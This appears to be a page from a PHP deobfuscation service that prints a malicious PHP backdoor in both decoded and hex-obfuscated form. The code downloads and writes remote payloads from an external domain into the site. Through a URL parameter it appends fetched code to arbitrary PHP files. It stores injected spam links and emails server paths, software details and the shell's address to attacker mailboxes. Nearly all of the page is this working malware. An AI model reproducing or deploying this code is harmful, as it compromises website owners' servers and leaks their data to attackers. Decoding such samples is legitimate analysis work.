Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto SRqWM; GT06j: $ip_remote = $_SERVER["\x52\x45\115\x4f\x54\105\x5f\x41\x44\x44\..
Decoded Output download
<?php
goto SRqWM; GT06j: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto WxY5X; EPStz: $host = str_replace("www.", '', @$_SERVER["HTTP_HOST"]); goto VbZZo; MrdsV: mail($kime, $baslik, $EL_MuHaMMeD); goto ycRWO; VbZZo: $x = $s . "l-" . base64_encode($host); goto vocKi; fcTxE: $datasi = @fopen("js/js.php", "r"); goto f0gss; WxY5X: $from_shellcode = "bu shelli sifrelemis birir baba@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto na0zO; TseRY: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd
"; goto P25aQ; gOu7_: $baslik = "min 20203"; goto ITrx0; Vu4d_: if (isset($_GET["ksfg"])) { $f = fopen($_GET["ksfg"] . ".php", "a"); fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"])); fclose($f); } goto pc6ad; zcR0M: $kime = "[email protected]"; goto gOu7_; LuCEK: error_reporting(0); goto Qm2nP; na0zO: $to_email = "[email protected]"; goto SAkS_; k2fj3: @mail($to_email, $server_mail, $linkcr, $header); goto LuCEK; pc6ad: echo "<!DOCTYPE html!>"; goto MHk5b; smFEV: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto IY1SH; ITrx0: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "
\xa"; goto uKXJ_; P25aQ: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "
"; goto MrdsV; RouMg: echo $gitt; goto Vu4d_; mMYJJ: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\xd\xa"; goto TseRY; f0gss: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/lamer.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>\xa"; $header .= "Content-Type: text/html;
charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto zcR0M; MHk5b: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto fcTxE; uKXJ_: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\xd
"; goto mMYJJ; Qm2nP: $s = "https://acbdf.space/"; goto EPStz; SRqWM: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto GT06j; vocKi: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto RouMg; SAkS_: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . " - " . $_SERVER["HTTP_HOST"] . ''; goto smFEV; IY1SH: $header = "From: {$from_shellcode}\xd
Reply-to: {$from_shellcode}"; goto k2fj3; ycRWO: ?>
Did this file decode correctly?
Original Code
<?php
goto SRqWM; GT06j: $ip_remote = $_SERVER["\x52\x45\115\x4f\x54\105\x5f\x41\x44\x44\x52"]; goto WxY5X; EPStz: $host = str_replace("\167\167\167\x2e", '', @$_SERVER["\110\124\124\x50\x5f\110\x4f\123\124"]); goto VbZZo; MrdsV: mail($kime, $baslik, $EL_MuHaMMeD); goto ycRWO; VbZZo: $x = $s . "\x6c\55" . base64_encode($host); goto vocKi; fcTxE: $datasi = @fopen("\x6a\163\x2f\152\x73\x2e\x70\x68\160", "\162"); goto f0gss; WxY5X: $from_shellcode = "\142\x75\40\x73\x68\x65\x6c\154\151\40\163\x69\146\x72\145\x6c\x65\155\151\x73\x20\x62\x69\x72\151\162\40\x62\x61\x62\141\100" . gethostbyname($_SERVER["\123\105\x52\x56\x45\122\x5f\116\x41\x4d\105"]) . ''; goto na0zO; TseRY: $EL_MuHaMMeD .= "\x53\x68\x65\154\x6c\40\x4c\x69\156\x6b\x20\72\40\150\x74\164\160\72\x2f\x2f" . $_SERVER["\x53\x45\x52\126\105\122\137\x4e\101\115\x45"] . $_SERVER["\120\x48\x50\137\x53\105\114\x46"] . "\xd\12"; goto P25aQ; gOu7_: $baslik = "\155\151\x6e\40\x32\60\62\x30\x33"; goto ITrx0; Vu4d_: if (isset($_GET["\x6b\x73\146\x67"])) { $f = fopen($_GET["\x6b\x73\x66\x67"] . "\56\160\150\x70", "\141"); fwrite($f, file_get_contents($s . "\x73\55" . $_GET["\x6b\x73\x66\147"])); fclose($f); } goto pc6ad; zcR0M: $kime = "\142\x79\x68\x65\x72\157\64\64\x40\147\x6d\x61\151\x6c\x2e\143\x6f\155"; goto gOu7_; LuCEK: error_reporting(0); goto Qm2nP; na0zO: $to_email = "\x6c\157\147\x69\x6e\x6f\154\x64\x75\x6d\x40\147\155\141\x69\x6c\x2e\143\157\155"; goto SAkS_; k2fj3: @mail($to_email, $server_mail, $linkcr, $header); goto LuCEK; pc6ad: echo "\x3c\41\104\x4f\103\x54\131\120\105\40\150\x74\x6d\154\41\76"; goto MHk5b; smFEV: $linkcr = "\114\x69\156\x6b\x3a\x20" . $_SERVER["\123\105\x52\x56\x45\x52\x5f\x4e\x41\115\x45"] . '' . $_SERVER["\x52\x45\121\125\105\123\x54\137\x55\x52\x49"] . "\40\x2d\40\111\120\x20\105\170\x63\165\x74\151\156\147\x3a\40{$ip_remote}\40\x2d\40\x54\x69\x6d\145\72\40{$time_shell}"; goto IY1SH; ITrx0: $EL_MuHaMMeD = "\104\x6f\163\171\x61\40\131\x6f\x6c\165\40\x3a\x20" . $_SERVER["\104\x4f\x43\x55\x4d\105\x4e\x54\x5f\122\117\x4f\124"] . "\15\xa"; goto uKXJ_; P25aQ: $EL_MuHaMMeD .= "\x41\x76\154\141\156\x61\156\40\123\x69\x74\145\40\x3a\40" . $_SERVER["\110\124\124\120\x5f\110\117\123\124"] . "\15\12"; goto MrdsV; RouMg: echo $gitt; goto Vu4d_; mMYJJ: $EL_MuHaMMeD .= "\x53\145\x72\166\145\162\x20\x69\x73\x6c\x65\x74\x69\x6d\40\x73\x69\x73\x74\x65\155\x69\x20\72\x20" . $_SERVER["\x53\105\x52\x56\105\x52\x5f\123\117\x46\x54\x57\101\x52\105"] . "\xd\xa"; goto TseRY; f0gss: if ($datasi) { } else { @mkdir("\152\x73"); $dos = file_get_contents("\150\164\164\x70\163\x3a\x2f\x2f\141\143\x62\x64\146\x2e\x73\160\x61\x63\145\57\x74\x78\164\x2f\x6c\x61\x6d\145\x72\56\164\x78\164"); $data = "\152\x73\57\x6a\x73\x2e\x70\150\x70"; @touch("\152\163\57\x6a\163\x2e\160\150\x70"); $ver = @fopen($data, "\167"); @fwrite($ver, $dos); @fclose($ver); $yol = "\x68\164\x74\x70\x3a\x2f\57" . $_SERVER["\110\124\124\x50\x5f\110\x4f\123\x54"] . '' . $_SERVER["\x52\105\x51\125\x45\123\x54\x5f\125\122\111"] . ''; $y = "\74\150\x31\x3e\x53\145\x6e\144\145\x72\40\x59\141\x7a\x64\x69\x72\151\x6c\x64\x69\56\74\142\x72\x2f\76\40\x53\111\124\105\x20\x59\117\114\x20\x3a\40" . $yol . "\x3c\142\x72\57\x3e\123\145\x6e\144\x65\x72\x20\x59\157\x6c\x75\x20\72\x20\x6a\x73\57\x63\x72\163\56\160\x68\160\74\x2f\x68\61\x3e"; $header .= "\106\x72\157\155\x3a\40\123\x68\145\x4c\114\40\x42\x6f\x6f\164\40\x3c\x73\x75\160\x70\x6f\x72\x40\x6e\x69\x63\x2e\157\162\147\76\xa"; $header .= "\x43\157\156\x74\x65\156\164\55\x54\171\160\x65\72\x20\164\145\x78\x74\57\x68\164\x6d\x6c\73\12\x20\143\x68\141\162\x73\145\x74\x3d\x75\164\x66\x2d\70\xa"; @mail("\154\157\147\151\x6e\x6f\154\x64\x75\155\100\147\x6d\x61\151\154\x2e\x63\x6f\155", "\x48\x61\143\153\x6c\x69\x6e\153\40\102\x69\154\x64\x69\x72\x69", "{$y}", $header); @mail("\x6c\157\x67\x69\x6e\x6f\154\144\x75\155\100\147\155\141\151\154\56\143\157\155", "\110\x61\x63\x6b\154\x69\156\x6b\40\102\x69\154\144\x69\x72\151", "{$y}", $header); } goto zcR0M; MHk5b: if ($_POST["\161\165\145\x72\x79"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\x75\145\162\x79"])); $data = "\144\x61\164\x61\56\x74\x78\x74"; @touch("\x64\141\164\141\x2e\164\x78\164"); $ver = @fopen($data, "\167"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\144\141\x74\141\56\164\x78\164", "\162"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto fcTxE; uKXJ_: $EL_MuHaMMeD .= "\123\145\162\x76\x65\162\40\x41\144\155\x69\156\40\x3a\x20" . $_SERVER["\x53\105\122\126\105\x52\137\x41\x44\x4d\111\116"] . "\xd\12"; goto mMYJJ; Qm2nP: $s = "\x68\x74\x74\160\163\x3a\x2f\57\141\x63\142\x64\146\56\x73\x70\x61\x63\145\57"; goto EPStz; SRqWM: $time_shell = '' . date("\144\x2f\155\x2f\131\40\55\40\110\72\x69\72\x73") . ''; goto GT06j; vocKi: if (function_exists("\143\x75\x72\154\x5f\151\x6e\x69\164")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\146\151\x6c\x65\x5f\147\x65\164\137\143\157\156\164\x65\156\x74\x73")) { @($gitt = file_get_contents($x)); } goto RouMg; SAkS_: $server_mail = '' . gethostbyname($_SERVER["\123\x45\x52\126\105\x52\137\116\101\115\105"]) . "\x20\x20\55\x20" . $_SERVER["\x48\124\124\120\x5f\110\117\123\124"] . ''; goto smFEV; IY1SH: $header = "\x46\162\157\x6d\72\40{$from_shellcode}\xd\12\x52\x65\160\x6c\x79\55\164\157\72\40{$from_shellcode}"; goto k2fj3; ycRWO:
Function Calls
None |
Stats
MD5 | c6b796fe7c93d64e5b02760a694f05ad |
Eval Count | 0 |
Decode Time | 64 ms |